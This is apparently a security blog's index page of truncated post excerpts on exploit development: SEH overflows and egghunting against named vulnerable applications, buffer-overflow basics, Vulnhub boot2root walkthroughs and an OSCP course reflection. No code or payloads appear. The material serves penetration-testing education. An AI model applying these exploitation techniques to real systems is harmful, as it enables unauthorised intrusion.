Ascii of D00M

Posted on Leave a comment

WooWEEE!! You guys are going to be. in. for. a. treat! Have you guys ever encoded your own payloads?? You will now if you follow along!! For this tutorial, I am going to be using SipXezPhone. This application is vulnerable to yet another SEH Overflow due to a long CSeq header. By now, you should […]

Egghunting Sorcery

Posted on Leave a comment

  This post is going to piggyback off my last post of “Stacks and Handlers and Python, oh my!“. So to follow along, please take the few seconds to head to that page, and definitely download the vulnerable software. If you do not have WinDBG, Immunity, or Mona…that page will have the downloads for them as […]

Stacks and Handlers and Python, oh my!

Posted on 2 Comments

Another overflow, and this gone be goooood 😉 This overflow will be based on overcoming SEH and using it to jump to our shellcode thus executing our sweet, sweet payload. This way of exploiting it, we won’t need to overwrite EIP as the first step like we did in a regular stack overflow. We actually […]

Gibson Walkthrough

Posted on Leave a comment

Can you hack le Gibson?? Here is how I went about doing it and this was absolutely fun!! Loved the twist that was there. You can find Gibson here Quick run-down: Enumeration Kung-fu Exploitation Read flag 🙂 Exploits used: OverlayFS Once we see who is on our net, as always, we began to enumerate our […]

Intro to Buffer Overflows

Posted on 4 Comments

Buffer overflows. How fun they can be, but intimidating if you have never fired up a debugger of any sort. Little numbers everywhere in four different boxes, with each box having its own specific purpose. Awesome. Get what you need first so that way you can follow along, and kick some ass! PCMan FTP Server Immunity […]

SickOs 1.2 Walkthrough

Posted on 1 Comment

  You can find SickOs here. Quick run-down: Service enumeration Check for any vulnerabilities Escalate to Root Get our flag 🙂 Exploit used: Chkrootkit 0.49 After seeing what is on my net, I began to do an Nmap scan on my target to see what kind of services are running. I see port 80 open […]

Droopy: v0.2 Walkthrough

Posted on 1 Comment

TL;DR: If you like watching instead, here’s a fairly short vid on getting root. Steps are below. Also, Dubstep is playing so if you don’t like it, please mute 🙂 For this VM, you can find it here.  It is a beginner’s boot2root so lets see how this goes. Quick run-down: Find Services Play with […]

Down with OSCP?? Yea, you know me!

Posted on 1 Comment

Back in February of last year, I had finally saved up enough pennies to purchase the Penetration Testing with Kali Linux. I was not fully aware of what I was getting myself into, despite reading the syllabus. As a side note if you are planning to take this course, please prepare yourself for the headaches, frustration, and especially…time! You’ll need […]

Simple CTF Walkthrough

Posted on Leave a comment

Yesterday, noticed there was a new-ish virtual machine on Vulnhub called Simple CTF. As the adventurous pioneer I am, I downloaded it and booted right up!! This is how I rooted Simple, and it was indeed…simple, haha! A quick run down of what I did was: Service enumeration Check for vulnerabilities Exploitation Privilege Escalation Read Flag in […]